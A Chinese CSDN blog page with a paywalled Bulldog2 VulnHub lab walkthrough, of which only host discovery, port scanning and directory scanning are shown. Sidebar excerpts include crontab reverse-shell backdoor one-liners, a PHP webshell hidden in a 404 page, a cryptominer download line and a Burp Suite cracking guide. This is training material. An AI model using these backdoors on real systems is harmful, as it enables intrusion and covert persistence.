VulnHub渗透测试-Bulldog2

最新推荐文章于 2024-10-22 16:23:24 发布

原味瓜子、

最新推荐文章于 2024-10-22 16:23:24 发布

阅读量353

点赞数 1

分类专栏： VulnHub渗透测试文章标签： Bulldog2 vulnhub 渗透测试渗透靶机

本文链接：https://blog.csdn.net/chenzzhenguo/article/details/108865938

版权

本文详细记录了对VulnHub的Bulldog2靶机进行渗透测试的过程，包括主机发现、端口扫描、Web扫描、漏洞利用、权限提升直至获取Flag。通过JS源码泄露、注册用户参数分析、JWT解码实现垂直越权，并利用命令执行漏洞反弹shell。最后尝试种植后门和清理痕迹，展示了完整的渗透测试流程。

摘要由CSDN通过智能技术生成

文章目录

渗透步骤

渗透步骤

一、主机发现、端口扫描

//主机发现
root@kali:~# ifconfig
root@kali:~# nmap -sn 192.168.56.1/24

//端口扫描，获取服务、系统版本信息
root@kali:~# nmap -sV -O 192.168.56.104

//目录扫描
root@kali:~# dirb http://192.168.56.104

二、Web扫描、漏洞发现

1、JS源码泄露
在这里插入图片描述 2、搜索关键字，获取信息

ctrl+f
register

在这里插入图片描述获获取注册用户所涉及的内容类型、传参方式以及注册路径

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

原味瓜子、

关注关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

(Vulnhub练习)--Bulldog1渗透实战

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

09-18

377

Bulldog1渗透实战文章转载靶机渗透测试实战（三）——Bulldog1渗透实战 Bulldog1渗透实战扫描不到bulldog主机ip 【1】从新启动bulldog，到开机页面选择第二个Ubuntu的高级选项。【2】进入高级选项，再次选择第二个Linux内核版本的恢复模式回车。选择root一行回车，进入命令行模式。 vim /etc/network/interfaces ，修改网卡名称成步骤查询的结果，保存。 auto ens33 iface ens33 inet dhcp reb

【vulnhub】---bulldog靶机

qq_43168364的博客

08-21

387

目录一、实验环境二、信息收集三、渗透测试 　　1、漏洞发现和利用　　2、提权四、总结一、实验环境靶机：bolldog靶机(192.168.1.105) 攻击机：kali Linux(192.168.1.104) 二、信息收集主机发现或者用netdiscover也可以。命令：netdiscover -i eth0 -r 192.168.1.0/24 端口扫描，首先用masscan看看它开启了哪些端口，他的速度过快时貌似发现不了某些端口，可以多扫描几次。使用nmap进行版本探测

参与评论您还未登录，请先登录后发表或查看评论

linux隐藏你的crontab后门

渗透测试教程

03-08

939

crontab定时后门 crontab是用来定期执行程序的命令，crond 命令每分钟会定期检查是否有要执行的工作，如果有要执行的工作便会自动执行该工作。注意: 新创建的 cron 任务，不会马上执行，至少要过 2 分钟后才可以，当然你可以重启 cron 来马上执行比如我们通过redis写crontab后，管理员上线执行crontab -l 就会查看到我们留下的可疑命令。那么我们如果躲避管理员的查看呢？其实 crontab -l 是查看保存在这里 /var/spool/cron

crontab一句话后门分析

weixin_30394669的博客

12-05

514

正常版本 (crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/127.0.0.1/8888;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab - 升级猥琐版本 (crontab -l;printf "*/60 *...

Burp pro破解篇

最新发布

2403_88316159的博客

10-22

222

2.下载注册机和汉化字典，放在同一目录下面（BurpLoaderKeygen_v1.17.jar，burpsuitloader-3.7.17-all.jar）文件在群里有。然后把burp程序中的第二个框框内容复制到注册机的Request中，然后把注册机中的生成的内容复制到burp的第三个框框中，点击next。重启burp（从cmd打开，然后输入java -jar BurpLoaderKeygen_v1.17.jar）4.点击run，然后把注册机的内容复制到Burp的程序中，然后点击next。

持久化后门crontab

黄都伟

07-06

841

服务器遇到了挖矿程序，wget --quiet http://m247.ltd:36663/.xmrig/0 -O- crontab计划任务导致了该告警的产生。crontab是Linux操作系统中常用的计划任务服务，黑客或恶意程序常常会通过添加修改cron任务使恶意程序定时重复启动，保持驻留。 1.vim /etc/crontab 找到这条命令删除并保存。 2.使用crontab -l 查看，crontab -e进入编辑页面，输入dd，删除, :wq! 保存退出 ...

LINUX留后门--教程（五）—— crontab隐藏后门

W小哥

07-08

3682

2.3 留crontab隐藏后门好不容易拿下一个网站，以后还想继续使用该系统，通常都会留下一些后门，本次我们留下一个crontab隐藏后门我们把1.sh、2.sh 文件放在本地搭建的web服务上，让受害者去下载执行 1.sh文件内容 #!/bin/bash bash -i >& /dev/tcp/192.168.184.145/5555 0>&1 反弹shell到IP地址：192.168.184.145 2.sh文件内容 (crontab -l;printf "* * *

权限维持-Linux-定时任务-Crontab后门

金灰的博客

07-01

354

【代码】权限维持-Linux-定时任务-Crontab后门。

【vulnhub】--- bulldog2靶机

qq_43168364的博客

08-21

476

目录一、实验环境靶机：bulldog2靶机(192.168.1.102、192.168.1.105) 攻击机：kali Linux(192.168.1.104) 二、靶机设置我们首先进行登录我们发现登录进去之后靶机是没有IP地址的，我们看看它的网卡配置文件。这里网卡设置的是dhcp，我们可以通过dhclient命令来获取IP。建议设置为桥接。现在两个网卡就都有IP地址了。接下来就可以进行渗透了。三、信息收集首先用nmap进行主机发现，命令：nmap -sn 192.168.1.

Vulnhub-Bulldog2 靶机渗透

Majula

02-04

395

WalkthroughDownloadDescriptionPen TestingScanningExploitationSolution ISolution IIPrivilege EscalationReview Download BULLDOG: 2 - VlunHub 靶机详细配置参考 Vulnhub-Bulldog1 靶机渗透这篇文章，此篇不再赘述。同样，启动靶机显示 IP 才算配置成功。 Description This is a Standard Boot-to-Root. Your

linux定时执行后门,linux隐藏你的crontab后门

weixin_39582569的博客

05-14

623

crontab定时后门crontab是用来定期执行程序的命令，crond 命令每分钟会定期检查是否有要执行的工作，如果有要执行的工作便会自动执行该工作。注意: 新创建的 cron 任务，不会马上执行，至少要过 2 分钟后才可以，当然你可以重启 cron 来马上执行比如我们通过redis写crontab后，管理员上线执行`crontab -l` 就会查看到我们留下的可疑命令。那么我们如果躲避管理员...

Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现（含靶场环境）下载地址.txt

04-21

Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现（含靶场环境）下载地址，真实有效，亲测可用。

crontab命令的正确用法

热门推荐

tuine's blog

07-10

1万+

原文链接：crontab命令的正确用法先看下用法：crontab参数管理cron机制，让系统在指定的时间，去执行指定命令。 -u:这个参数可以让我们去编辑其他人的crontab，如果没有加上这个参数的话就会开启自己的crontab crontab -u 使用者名称 -l:可以列出crontab的内容 -r:可以移除crontab -e:可以使用系统预设的编辑器，开...

Linux学习之Ubuntu利用Cron机制安装后门

weixin_42514162的博客

10-31

671

话说在前面，这是我看了另一个博主的文章，自己在自己的电脑上实验的结果，不是剽窃。原博主将得很详细，他的文章在这里。首先，说明一下，Cron是ubuntu下默认启动的用户执行计划。它会按照设置，在固定的周期或者按照一定时间执行某一个任务。它是一项服务，你可以使用基本的服务查看状态命令等查看信息。 service cron status 查看普通用户的执行计划。（如果你显示没有计划不要着急，后面加上cron.allow和cron.deny）就有了。 crontab -l 查看crontab的选

怎么链接php一句话后门,PHP一句话后门

weixin_42515295的博客

03-27

516

1、利用404页面隐藏一句话404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>2、无特征隐藏一句话session_start(...

crontab排查一例

weixin_33860737的博客

10-13

首先QA部门反馈过来有70台机器在work用户下周期性定时任务无法执行，其他的400台服务器执行此命令没有问题， crontab -e中写入： 44 */4 * * * `source /etc/profile;source /home/work/.bash_profile;/home/work/staf/extbin/atd/atdupdate` 首先我们从cront...

记一次在前公司留的大坑之crontab

又是废柴的一天。。。

04-13

607

离职不到一个月，公司经理打电话告诉我：今天早晨服务器奔溃一次，重启之后apache无法运行了。输入运行命令后如图所示我保证不是我干的，这也是我工作的心血。后续又发来一张图 inode耗尽，无法删除mail文件夹及其中内容。无法备份数据库做重置。阿里云提交工单也是无法保护好数据。死马当做活马医！1、修改crontabmailto='' //以下是你的crontab内容2、删除项目中无用的日志、缓存...

BurpSuite安装和基础使用教程(已破解)

m0_74914256的博客

02-23

7768

Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多Burp工具，这些不同的burp工具通过协同工作，有效的分享信息，支持以某种工具中的信息为基础供另一种工具使用的方式发起攻击。它主要用来做安全性渗透测试，可以实现拦截请求、Burp Spider爬虫、漏洞扫描（付费）等类似Fiddler和Postman但比其更强大的功能。那么我们开始安装教程

bash入门教程

FreeXploiT

01-09

2500

星期三, 十月 06, 2004<!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/"

Python操作MySQL数据库：cursor游标详解与渗透测试思路

- Vulnhub提供了多个渗透测试环境，如Breach1.0, Billu_b0x, Bulldog1等，用于实践和提升渗透测试技能。 - 靶场涵盖了多种漏洞类型，包括文件包含、SQL注入、文件上传等，模拟真实环境下的安全挑战。通过上述...